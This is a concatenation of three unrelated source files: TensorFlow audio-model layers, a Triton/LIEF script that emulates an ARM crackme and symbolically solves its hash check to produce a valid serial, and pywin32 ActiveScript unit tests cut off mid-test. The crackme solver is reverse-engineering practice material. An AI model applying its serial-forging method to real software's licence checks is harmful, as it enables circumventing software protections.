def pitch_embeddings(batch,
timesteps=1,
n_pitches=128,
dim_embedding=128,
reuse=False):
"""Get a embedding of each pitch note.
Args:
batch: NSynthDataset batch dictionary.
timesteps: Number of timesteps to replicate across.
n_pitches: Number of one-hot embeddings.
dim_embedding: Dimension of linear projection of one-hot encoding.
reuse: Reuse variables.
Returns:
embedding: A tensor of shape [batch_size, 1, timesteps, dim_embedding].
"""
batch_size = batch["pitch"].get_shape().as_list()[0]
with tf.variable_scope("PitchEmbedding", reuse=reuse):
w = tf.get_variable(
name="embedding_weights",
shape=[n_pitches, dim_embedding],
initializer=tf.random_normal_initializer())
one_hot_pitch = tf.reshape(batch["pitch"], [batch_size])
one_hot_pitch = tf.one_hot(one_hot_pitch, depth=n_pitches)
embedding = tf.matmul(one_hot_pitch, w)
embedding = tf.reshape(embedding, [batch_size, 1, 1, dim_embedding])
if timesteps > 1:
embedding = tf.tile(embedding, [1, 1, timesteps, 1])
return embedding
def slim_batchnorm_arg_scope(is_training, activation_fn=None):
"""Create a scope for applying BatchNorm in slim.
This scope also applies Glorot initialization to convolutional weights.
Args:
is_training: Whether this is a training run.
activation_fn: Activation function to apply to the convolution result (or None).
Returns:
scope: Use this scope to automatically apply BatchNorm and Xavier Init to
slim.conv2d and slim.fully_connected.
"""
batch_norm_params = {
"is_training": is_training,
"decay": 0.999,
"epsilon": 0.001,
"variables_collections": {
"beta": None,
"gamma": None,
"moving_mean": "moving_vars",
"moving_variance": "moving_vars",
}
}
with slim.arg_scope(
[slim.conv2d, slim.fully_connected, slim.conv2d_transpose],
weights_initializer=slim.initializers.xavier_initializer(),
activation_fn=activation_fn,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params) as scope:
return scope
def conv2d(x,
kernel_size,
stride,
channels,
is_training,
scope="conv2d",
batch_norm=False,
residual=False,
gated=False,
activation_fn=tf.nn.relu,
resize=False,
transpose=False,
stacked_layers=1):
"""2D-Conv with optional batch_norm, gating, residual.
Args:
x: Tensor input [MB, H, W, CH].
kernel_size: List [H, W].
stride: List [H, W].
channels: Int, output channels.
is_training: Whether to collect stats for BatchNorm.
scope: Enclosing scope name.
batch_norm: Apply batch normalization
residual: Use residual connections; requires stacked_layers >= 2.
gated: Gating ala Wavenet.
activation_fn: Nonlinearity function.
resize: For transposed convolutions, upsample with image resizing plus a stride-1 convolution instead of conv_transpose.
transpose: Use conv_transpose instead of conv.
stacked_layers: Number of layers before a residual connection.
Returns:
x: Tensor output.
"""
# For residual
x0 = x
# Choose convolution function
conv_fn = slim.conv2d_transpose if transpose else slim.conv2d
# Double output channels for gates
num_outputs = channels * 2 if gated else channels
normalizer_fn = slim.batch_norm if batch_norm else None
with tf.variable_scope(scope + "_Layer"):
# Apply a stack of convolutions Before adding residual
for layer_idx in range(stacked_layers):
with slim.arg_scope(
slim_batchnorm_arg_scope(is_training, activation_fn=None)):
# Use interpolation to upsample instead of conv_transpose
if transpose and resize:
unused_mb, h, w, unused_ch = x.get_shape().as_list()
x = tf.image.resize_images(
x, size=[h * stride[0], w * stride[1]], method=0)
stride_conv = [1, 1]
else:
stride_conv = stride
x = conv_fn(
inputs=x,
stride=stride_conv,
kernel_size=kernel_size,
num_outputs=num_outputs,
normalizer_fn=normalizer_fn,
biases_initializer=tf.zeros_initializer(),
scope=scope)
if gated:
with tf.variable_scope("Gated"):
x1, x2 = x[:, :, :, :channels], x[:, :, :, channels:]
if activation_fn:
x1, x2 = activation_fn(x1), tf.sigmoid(x2)
else:
x2 = tf.sigmoid(x2)
x = x1 * x2
# Apply residual to last layer before the last nonlinearity
if residual and (layer_idx == stacked_layers - 1):
with tf.variable_scope("Residual"):
# Don't upsample residual in time
if stride[0] == 1 and stride[1] == 1:
channels_in = x0.get_shape().as_list()[-1]
# Make n_channels match for residual
if channels != channels_in:
x0 = slim.conv2d(
inputs=x0,
stride=[1, 1],
kernel_size=[1, 1],
num_outputs=channels,
normalizer_fn=None,
activation_fn=None,
biases_initializer=tf.zeros_initializer,
scope=scope + "_residual")
x += x0
else:
x += x0
if activation_fn and not gated:
x = activation_fn(x)
return x
def leaky_relu(leak=0.1):
"""Leaky ReLU activation function.
Args:
leak: float. Slope for the negative part of the leaky ReLU function.
Defaults to 0.1.
Returns:
A lambda computing the leaky ReLU function with the specified slope.
"""
return lambda x: tf.maximum(x, leak * x)
def causal_linear(x, n_inputs, n_outputs, name, filter_length, rate,
batch_size):
"""Applies dilated convolution using queues.
Assumes a filter_length of 3.
Args:
x: The [mb, time, channels] tensor input.
n_inputs: The input number of channels.
n_outputs: The output number of channels.
name: The variable scope to provide to W and biases.
filter_length: The length of the convolution, assumed to be 3.
rate: The dilation rate of the convolution.
batch_size: Non-symbolic value for batch_size.
Returns:
y: The output of the operation
(init_1, init_2): Initialization operations for the queues
(push_1, push_2): Push operations for the queues
"""
assert filter_length == 3
# create queue
q_1 = tf.FIFOQueue(rate, dtypes=tf.float32, shapes=(batch_size, 1, n_inputs))
q_2 = tf.FIFOQueue(rate, dtypes=tf.float32, shapes=(batch_size, 1, n_inputs))
init_1 = q_1.enqueue_many(tf.zeros((rate, batch_size, 1, n_inputs)))
init_2 = q_2.enqueue_many(tf.zeros((rate, batch_size, 1, n_inputs)))
state_1 = q_1.dequeue()
push_1 = q_1.enqueue(x)
state_2 = q_2.dequeue()
push_2 = q_2.enqueue(state_1)
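# q_1 caches the activation from `rate` steps ago and q_2 the one from 2*rate
# steps ago, so each call applies the three filter taps to
# (x[t - 2*rate], x[t - rate], x[t]) -- one step of a length-3 dilated causal
# convolution, suitable for incremental (sample-by-sample) generation.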
# get pretrained weights
w = tf.get_variable(
name=name + "/W",
shape=[1, filter_length, n_inputs, n_outputs],
dtype=tf.float32)
b = tf.get_variable(
name=name + "/biases", shape=[n_outputs], dtype=tf.float32)
w_q_2 = tf.slice(w, [0, 0, 0, 0], [-1, 1, -1, -1])
w_q_1 = tf.slice(w, [0, 1, 0, 0], [-1, 1, -1, -1])
w_x = tf.slice(w, [0, 2, 0, 0], [-1, 1, -1, -1])
# perform op w/ cached states
y = tf.nn.bias_add(
tf.matmul(state_2[:, 0, :], w_q_2[0][0]) + tf.matmul(
state_1[:, 0, :], w_q_1[0][0]) + tf.matmul(x[:, 0, :], w_x[0][0]), b)
y = tf.expand_dims(y, 1)
return y, (init_1, init_2), (push_1, push_2)
def linear(x, n_inputs, n_outputs, name):
"""Simple linear layer.
Args:
x: The [mb, time, channels] tensor input.
n_inputs: The input number of channels.
n_outputs: The output number of channels.
name: The variable scope to provide to W and biases.
Returns:
y: The output of the operation.
"""
w = tf.get_variable(
name=name + "/W", shape=[1, 1, n_inputs, n_outputs], dtype=tf.float32)
b = tf.get_variable(
name=name + "/biases", shape=[n_outputs], dtype=tf.float32)
y = tf.nn.bias_add(tf.matmul(x[:, 0, :], w[0][0]), b)
y = tf.expand_dims(y, 1)
return y
|
|
#! /usr/bin/env python3
## -*- coding: utf-8 -*-
from __future__ import print_function
from triton import *
import random
import string
import sys
import lief
import os
DEBUG = True
INPUT = 'arm32'
SERIAL = None
TARGET = os.path.join(os.path.dirname(__file__), 'crackme_hash-arm')
VALID = False
FINISH = False
MAX_INSTRS = 10000
# The debug function
def debug(s):
if DEBUG: print(s)
# Memory mapping
BASE_PLT = 0x10000000
BASE_ARGV = 0x20000000
BASE_STACK = 0x9fffffff
def getMemoryString(ctx, addr):
s = str()
index = 0
while ctx.getConcreteMemoryValue(addr+index):
c = chr(ctx.getConcreteMemoryValue(addr+index))
if c not in string.printable: c = ""
s += c
index += 1
return s
def getFormatString(ctx, addr):
return getMemoryString(ctx, addr) \
.replace("%s", "{}").replace("%d", "{:d}").replace("%#02x", "{:#02x}") \
.replace("%#x", "{:#x}").replace("%x", "{:x}").replace("%02X", "{:02x}") \
.replace("%c", "{:c}").replace("%02x", "{:02x}").replace("%ld", "{:d}") \
.replace("%*s", "").replace("%lX", "{:x}").replace("%08x", "{:08x}") \
.replace("%u", "{:d}").replace("%lu", "{:d}") \
# Simulate the printf() function
def printfHandler(ctx):
debug('[+] printf hooked')
# Get arguments
arg1 = getFormatString(ctx, ctx.getConcreteRegisterValue(ctx.registers.r0))
arg2 = ctx.getConcreteRegisterValue(ctx.registers.r1)
arg3 = ctx.getConcreteRegisterValue(ctx.registers.r2)
arg4 = ctx.getConcreteRegisterValue(ctx.registers.r3)
arg5 = ctx.getConcreteRegisterValue(ctx.registers.r4)
arg6 = ctx.getConcreteRegisterValue(ctx.registers.r5)
nbArgs = arg1.count("{")
args = [arg2, arg3, arg4, arg5, arg6][:nbArgs]
s = arg1.format(*args)
sys.stdout.write(s + "\n")
# Return value
return len(s)
# Simulate the puts() function
def putsHandler(ctx):
debug('[+] puts hooked')
# Get arguments
arg1 = getMemoryString(ctx, ctx.getConcreteRegisterValue(ctx.registers.r0))
sys.stdout.write(arg1 + '\n')
# Return value
return len(arg1) + 1
def abortHandler(ctx):
global FINISH
debug('[+] abort hooked')
# sys.exit(0)
FINISH = True
return
def libcMainHandler(ctx):
debug('[+] __libc_start_main hooked')
# Get main function address.
main_addr = ctx.getConcreteRegisterValue(ctx.registers.r0)
# Setup argc / argv
ctx.concretizeRegister(ctx.registers.r0)
ctx.concretizeRegister(ctx.registers.r1)
argvs = [
bytes(TARGET.encode('utf-8')), # argv[0]
bytes(INPUT.encode('utf-8'))
]
# Define argc / argv
base = BASE_ARGV
addrs = list()
index = 0
for argv in argvs:
addrs.append(base)
ctx.setConcreteMemoryAreaValue(base, argv+b'\x00')
if index == 1:
# Only symbolize argv[1]
for indexCell in range(len(argv)):
var = ctx.symbolizeMemory(MemoryAccess(base+indexCell, CPUSIZE.BYTE))
var.setComment('argv[%d][%d]' %(index, indexCell))
debug('[+] argv[%d] = %s' %(index, argv))
base += len(argv)+1
index += 1
argc = len(argvs)
argv = base
for addr in addrs:
ctx.setConcreteMemoryValue(MemoryAccess(base, CPUSIZE.DWORD), addr)
base += CPUSIZE.DWORD
ctx.setConcreteRegisterValue(ctx.registers.r0, argc)
ctx.setConcreteRegisterValue(ctx.registers.r1, argv)
# Simulate call to main
# debug('[+] Simulating call to main...')
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)-CPUSIZE.DWORD)
push_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
ctx.setConcreteMemoryValue(push_addr, main_addr)
# debug(' Pushing {:x} at {:x}'.format(main_addr, ctx.getConcreteRegisterValue(ctx.registers.sp)))
return None
# Functions to emulate
customRelocation = [
('printf', printfHandler, BASE_PLT + 0 << 2),
('puts', putsHandler, BASE_PLT + 1 << 2),
('__libc_start_main', libcMainHandler, BASE_PLT + 2 << 2),
('abort', abortHandler, BASE_PLT + 4 << 2),
]
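# Each entry maps an imported libc symbol to a Python handler and a fake PLT
# address: makeRelocation() patches the binary's GOT entries with these
# addresses, and hookingHandler() dispatches to the handler when the emulated
# PC reaches one of them.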
def hookingHandler(ctx):
pc = ctx.getConcreteRegisterValue(ctx.registers.pc)
for rel in customRelocation:
if rel[2] == pc:
# Simulate push {lr}
# debug('[+] Simulating "push {lr}"')
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)-CPUSIZE.DWORD)
push_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
ctx.setConcreteMemoryValue(push_addr, ctx.getConcreteRegisterValue(ctx.registers.r14))
# debug(' lr : {:x}'.format(ctx.getConcreteRegisterValue(ctx.registers.r14)))
# Emulate the routine and the return value
ret_value = rel[1](ctx)
if ret_value is not None:
ctx.setConcreteRegisterValue(ctx.registers.r0, ret_value)
# Simulate pop {lr}
# debug('[+] Simulating "pop {pc}"')
pop_addr = MemoryAccess(ctx.getConcreteRegisterValue(ctx.registers.sp), CPUSIZE.DWORD)
pc = ctx.getConcreteMemoryValue(pop_addr)
ctx.setConcreteRegisterValue(ctx.registers.sp, ctx.getConcreteRegisterValue(ctx.registers.sp)+CPUSIZE.DWORD)
# debug(" pc : {:x}".format(pc))
# Update PC
ctx.setConcreteRegisterValue(ctx.registers.pc, pc)
return
# Emulate the binary.
def emulate(ctx, pc):
global SERIAL
global VALID
count = 0
while pc and count < MAX_INSTRS and not FINISH:
# Fetch opcodes
opcodes = ctx.getConcreteMemoryAreaValue(pc, 4)
# Create the Triton instruction
instruction = Instruction()
instruction.setOpcode(opcodes)
instruction.setAddress(pc)
# Process
if ctx.processing(instruction) == False:
opcodes_str = " ".join(["{:02x}".format(ord(b)) for b in instruction.getOpcode()])
debug('[-] Instruction not supported: %s\t%s' %(opcodes_str, str(instruction)))
break
# debug(instruction)
# .text:00010518 LDR R0, =unk_105C0 ; s
# .text:0001051C BL puts
# .text:00010520 B loc_1052C
if pc == 0x1051C:
# We validated the crackme
VALID = True
# .text:0001050C LDR R2, =0xAD6D
# .text:00010510 CMP R3, R2
# .text:00010514 BNE loc_10524
if pc == 0x10510 and SERIAL is None:
print('[+] Please wait, calculating hash collisions...')
r3 = ctx.getSymbolicRegister(ctx.registers.r3)
SymVar_0 = ctx.getSymbolicVariable('SymVar_0')
SymVar_1 = ctx.getSymbolicVariable('SymVar_1')
SymVar_2 = ctx.getSymbolicVariable('SymVar_2')
SymVar_3 = ctx.getSymbolicVariable('SymVar_3')
SymVar_4 = ctx.getSymbolicVariable('SymVar_4')
astCtxt = ctx.getAstContext()
# Constrain each symbolic byte to a printable lowercase ASCII letter ('a'..'z')
expr = astCtxt.land([
astCtxt.bvugt(astCtxt.variable(SymVar_0), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_0), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_1), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_1), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_2), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_2), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_3), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_3), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_4), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_4), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.equal(r3.getAst(), astCtxt.bv(0xad6d, CPUSIZE.DWORD_BIT)) # collision: (assert (= r3 0xad6d))
])
# Get max 20 different models
models = ctx.getModels(expr, 20)
print('[+] Found several hash collisions:')
for model in models:
print({k: "0x%x, '%c'" % (v.getValue(), v.getValue()) for k, v in list(model.items())})
SERIAL = str()
for _, v in list(sorted(models[0].items())):
SERIAL += "%c" % (v.getValue())
print('[+] Pick up the first serial: %s' %(SERIAL))
# Inc the number of instructions executed
count += 1
# Simulate routines
hookingHandler(ctx)
# Next
pc = ctx.getConcreteRegisterValue(ctx.registers.pc)
debug('[+] Instruction executed: %d' %(count))
return
def loadBinary(ctx, binary):
# Map the binary into the memory
phdrs = binary.segments
for phdr in phdrs:
size = phdr.physical_size
vaddr = phdr.virtual_address
debug('[+] Loading 0x%06x - 0x%06x' %(vaddr, vaddr+size))
ctx.setConcreteMemoryAreaValue(vaddr, phdr.content)
return
def makeRelocation(ctx, binary):
# Perform our own relocations
try:
for rel in binary.pltgot_relocations:
symbolName = rel.symbol.name
symbolRelo = rel.address
for crel in customRelocation:
if symbolName == crel[0]:
debug('[+] Hooking %s' %(symbolName))
debug(' {:x} : {:x}'.format(symbolRelo, crel[2]))
ctx.setConcreteMemoryValue(MemoryAccess(symbolRelo, CPUSIZE.DWORD), crel[2])
except:
pass
# Perform our own relocations
try:
for rel in binary.dynamic_relocations:
symbolName = rel.symbol.name
symbolRelo = rel.address
for crel in customRelocation:
if symbolName == crel[0]:
debug('[+] Hooking %s' %(symbolName))
debug(' {:x} : {:x}'.format(symbolRelo, crel[2]))
ctx.setConcreteMemoryValue(MemoryAccess(symbolRelo, CPUSIZE.DWORD), crel[2])
except:
pass
return
def run(ctx, binary):
# Concretize previous context
ctx.concretizeAllMemory()
ctx.concretizeAllRegister()
# Define a fake stack
ctx.setConcreteRegisterValue(ctx.registers.sp, BASE_STACK)
# Let's emulate the binary from the entry point
debug('[+] Starting emulation.')
emulate(ctx, binary.entrypoint)
debug('[+] Emulation done.')
return
def main():
global INPUT
global SERIAL
global FINISH
# Get a Triton context
ctx = TritonContext()
# Set the architecture
ctx.setArchitecture(ARCH.ARM32)
# Set optimization
ctx.setMode(MODE.ALIGNED_MEMORY, True)
ctx.setMode(MODE.ONLY_ON_SYMBOLIZED, True)
# Parse the binary
binary = lief.parse(TARGET)
# Load the binary
loadBinary(ctx, binary)
# Perform our own relocations
makeRelocation(ctx, binary)
# First emulation
run(ctx, binary)
FINISH = False
# Replace the input with the good serial to validate the chall
INPUT = SERIAL
# Second emulation
print('[+] Start a second emulation with the good serial to validate the challenge')
run(ctx, binary)
return not VALID
if __name__ == '__main__':
retValue = main()
sys.exit(retValue)
|
|
# These are tests for the IActiveScript related interfaces. They are
# written in Python as the pywin32 package provides support for the vtable
# based interfaces used - meaning the other (reasonable) alternative
# would be C++.
# The intention is that, wherever possible, we use the Windows Scripting
# Host to do the testing - but anything that can't be done that way, such
# as basic checks of the engine itself, is done here.
# taken from pywin32's win32comext/axscript/test/testHost.py
import sys
import unittest
# These modules come from the pywin32 package (sf.net/projects/pywin32)
try:
import pythoncom
except ImportError:
print >> sys.stderr, "This package requires the pywin32 extensions - http://sf.net/projects/pywin32"
sys.exit(1)
from win32com.axscript import axscript
from win32com.server.util import wrap, Collection
from win32com.server.exception import COMException
import winerror
# Other misc stuff.
AXTAM_CLSID = "application/ecmascript;version=4"
# Known failures are a good indication of things to do :)
skip_known_failures = True #False
IActiveScriptSite_methods = """
GetLCID GetItemInfo GetDocVersionString OnScriptTerminate OnStateChange
OnScriptError OnEnterScript OnLeaveScript""".split()
class TestScriptCollection(Collection):
"""A 'collection', used to test enum semantics"""
def _NewEnum(self):
return Collection._NewEnum(self)
class TestScriptObject:
"""This object is added to the ScriptEngine with the name 'test'. Script
code can reference the 'public' properties of this object.
"""
_public_methods_ = [ 'call', 'fail' ]
_public_attrs_ = ['value', 'collection', 'list']
def __init__(self):
self.collection = wrap( TestScriptCollection( [1,'Two',3] ))
self.list = ["One", 2, "Three"]
self.last_call_args = None
self.fail_called = 0
self.value = None
def call(self, *args):
self.last_call_args = args
def fail(self, hresult=winerror.E_FAIL):
raise COMException(hresult=hresult)
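# Script-side sketch: once this object is registered as 'test', engine code such
# as "test.value = 2", "test.call('foo')" or "test.fail()" round-trips through
# it (see the TestNames and TestDispatchConsumer cases below).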
class AXTestSite:
"""An IActiveScriptSite implementation used for testing our engine."""
_public_methods_ = IActiveScriptSite_methods
_com_interfaces_ = [ axscript.IID_IActiveScriptSite ]
def __init__(self, testcase):
self.testcase = testcase
self.terminate_result = None
self.terminate_excepInfo = None
self.last_error = None
self.last_state = None
self.num_enter_script = 0
self.num_leave_script = 0
engine = pythoncom.CoCreateInstance(AXTAM_CLSID, None,
pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
# We use 2 interfaces from the object - get them now.
self.engine_script = engine.QueryInterface(axscript.IID_IActiveScript)
self.engine_parse = engine.QueryInterface(axscript.IID_IActiveScriptParse)
def init_engine(self):
self.engine_script.SetScriptSite(wrap(self))
self.engine_parse.InitNew()
def close(self):
# Should probably transition engine to the closed state too...
if self.engine_script:
self.engine_script.Close()
self.engine_script = None
self.engine_parse = None
def _SetNamedItems(self, items):
self.named_items = items
for name, (dispatch, typeinfo, flags) in self.named_items.iteritems():
self.engine_script.AddNamedItem(name, flags)
# IActiveScriptSite methods
def GetLCID(self):
return 0
def GetItemInfo(self, name, returnMask):
disp, ti, flags = self.named_items[name]
ret_disp = ret_ti = None
if returnMask & axscript.SCRIPTINFO_IUNKNOWN:
ret_disp = disp
if returnMask & axscript.SCRIPTINFO_ITYPEINFO:
ret_ti = ti
return ret_disp, ret_ti
def GetDocVersionString(self):
return 'axtam test script host 1.0'
def OnScriptTerminate(self, result, excepInfo):
self.terminate_result = result
self.terminate_excepInfo = excepInfo
def OnStateChange(self, state):
self.last_state = state
def OnScriptError(self, errorInterface):
self.last_error = errorInterface
def OnEnterScript(self):
self.num_enter_script += 1
def OnLeaveScript(self):
self.num_leave_script += 1
# The base classes for all our test cases. Note that tests should generally
# *not* be added to these base classes, else they will be run once for each
# class that derives from us.
# This is the most basic, and it doesn't fully initialize the engine.
# You may want to derive your test case from a sub-class rather than
# directly from this class.
class TestCase(unittest.TestCase):
expecting_errors = False
def setUp(self):
self.site = AXTestSite(self)
def tearDown(self):
if self.site:
try:
if not self.expecting_errors and self.site.last_error is not None:
excep_info = self.site.last_error.GetExceptionInfo()
self.fail("Script Error Detected: %s" % (excep_info,))
finally:
self.site.close()
def assertRaisesCOMError(self, func, *args, **kw):
expected_hresult = kw.get('hresult')
try:
func(*args)
raise AssertionError, "%s did not fail!" % (func,)
except pythoncom.com_error, exc:
if expected_hresult is None:
return
if exc[0] != expected_hresult:
self.fail("Expected %s to return %d - got %d instead" % (func, expected_hresult, exc[0]))
def _prepareNamedItems(self):
flags = axscript.SCRIPTITEM_ISVISIBLE | axscript.SCRIPTITEM_GLOBALMEMBERS
self.test_script_ob = TestScriptObject()
n = {'test': (wrap(self.test_script_ob), None, flags)}
self.site._SetNamedItems(n)
def parseScriptText(self, code,
sourceContextCookie=0,
startLineNumber=0,
flags=0,
start_engine=True, expect_exc=False):
try:
self.site.engine_parse.ParseScriptText(code, None, None, None,
sourceContextCookie,
startLineNumber, flags)
if start_engine:
self.startEngine()
self.failIf(expect_exc, "expected an exception - but things worked")
except pythoncom.com_error:
if not expect_exc:
raise
def startEngine(self):
self.site.engine_script.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
# Fully initialized the engine and adds a 'test' script object.
class TestCaseInitialized(TestCase):
def setUp(self):
TestCase.setUp(self)
self.site.init_engine()
self._prepareNamedItems()
# The "real" test cases - these have the tests...
class TestSimple(TestCaseInitialized):
def testSimple(self):
# do nothing at all - just make sure we can setup and tear down.
pass
class TestState(TestCase):
def _setCheckState(self, new_state):
self.site.engine_script.SetScriptState(new_state)
# check engine says its in the new state
self.failUnlessEqual(self.site.engine_script.GetScriptState(), new_state)
# check the engine called back with the new state correctly.
self.failUnlessEqual(self.site.engine_script.GetScriptState(), self.site.last_state)
def testStateInitialized(self):
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_UNINITIALIZED)
self.failUnlessEqual(self.site.last_state, None) # never been set yet.
# InitNew puts everything into the Initialized state.
self.site.init_engine()
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
# the engine should have notified of the new state.
self.failUnlessEqual(get_state(), self.site.last_state)
def testStateInitializedEarly(self):
# Check InitNew can be called before SetScriptSite, which is
# what IE does.
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_UNINITIALIZED)
self.site.engine_parse.InitNew()
# should now be initialized.
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
# set the site so we cleanup without dumping debug messages.
self.site.engine_script.SetScriptSite(wrap(self.site))
def testStateTransitions(self):
# InitNew puts everything into the Initialized state.
self.site.init_engine()
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
self.failUnlessEqual(get_state(), self.site.last_state)
# Move to started
self.site.engine_script.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
# It should be impossible to transition back to UNINITIALIZED
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_UNINITIALIZED)
# But we should be able to move forward to STARTED then CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_STARTED)
# to CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_CONNECTED)
# It should be impossible to move back to STARTED
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED)
# but we *can* move back to initialized.
self._setCheckState(axscript.SCRIPTSTATE_INITIALIZED)
# Lets jump all the way to CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_CONNECTED)
# Then DISCONNECTED
self._setCheckState(axscript.SCRIPTSTATE_DISCONNECTED)
# can't move back to started or connected
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED)
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_CONNECTED)
# and again back to initialized.
self._setCheckState(axscript.SCRIPTSTATE_INITIALIZED)
# close the engine - all state transitions are invalid.
self._setCheckState(axscript.SCRIPTSTATE_CLOSED)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_INITIALIZED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_CONNECTED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_DISCONNECTED,
hresult = winerror.E_FAIL)
def testNothingExecutedUntilStarted(self):
code = "test.value = 2"
self.site.init_engine()
self._prepareNamedItems()
self.parseScriptText(code, start_engine=False)
# code should not have been executed - so .value should remain None
self.failUnlessEqual(self.test_script_ob.value, None)
# now move to started.
self.startEngine()
# code was executed, so .value should be 2
self.failUnlessEqual(self.test_script_ob.value, 2)
class TestNames(TestCaseInitialized):
def testExplicitKnownProperty(self):
code = "test.value = 2"
self.parseScriptText(code)
self.failUnlessEqual(self.test_script_ob.value, 2)
def testImplicitKnownProperty(self):
# Setting 'value' should set 'test.value', as the 'test' object was
# added with SCRIPTITEM_GLOBALMEMBERS
code = "value = 2"
self.parseScriptText(code)
if not skip_known_failures:
self.failUnlessEqual(self.test_script_ob.value, 2)
class TestExceptions(TestCaseInitialized):
expecting_errors = True # stop base class from complaining about exceptions
# The 'ulStartingLineNumber' param to the AXScript functions is ambiguous:
# MSDN says "Zero-based value that specifies which line the parsing will
# begin at", but it can be simply demonstrated JS uses a 1-based scheme
# (but I guess it depends how you define 0-based :) Sadly, the docs for
# GetSourcePosition, which is impacted by the ulStartingLineNumber, don't
# say anything about this.
# So: let's just prove we do the same as Microsoft's javascript.
def testJSLineOffset(self):
site = AXTestSite(self)
# javascript comes with Windows, so we can assume its installed.
engine = pythoncom.CoCreateInstance("javascript", None,
pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
try:
ias = engine.QueryInterface(axscript.IID_IActiveScript)
ias.SetScriptSite(wrap(site))
iasp = engine.QueryInterface(axscript.IID_IActiveScriptParse)
iasp.InitNew()
ias.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
# A SyntaxError on "line 2"
code = "// comment\nfoo]\n"
# pass a startLine of 0, JS says the error is on line 1.
sln = 0
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 1)
# pass a startLine of 1, JS says the error is on line 2.
sln = 1
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 2)
#
#
# Check a runtime error works the same way.
code = "// a comment line\nx = bad_name\n"
# pass a startLine of 0, JS says the error is on line 1.
sln = 0
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 1)
# pass a startLine of 1, JS says the error is on line 2.
sln = 1
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 2)
# See the later tests of our engine which test the same thing.
finally:
ias.Close()
iasp = None # in case a traceback holds on to it.
def testLineNumber(self):
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so it's reported as 1 (see JS test above)
self.failUnlessEqual(line, 1)
# and do it again just to prove we aren't faking.
code = "// a comment line\n//\n//\n//\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so it's reported as 4
self.failUnlessEqual(line, 4)
def testLineNumberAdjusted(self):
# Tell the script engine the source code really started further into a
# file (startLineNumber=1), so reported line numbers should be adjusted accordingly.
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True, startLineNumber=1)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so it's reported as 2 (see JS test above)
self.failUnlessEqual(line, 2)
def testContext(self):
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, sourceContextCookie=123, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# The hope is that the existing IActiveScriptError impl can be
# replaced with a script version. The problem with that will be
# that the frame etc is not exposed to script, so it's not clear
# how to do that.
if not skip_known_failures:
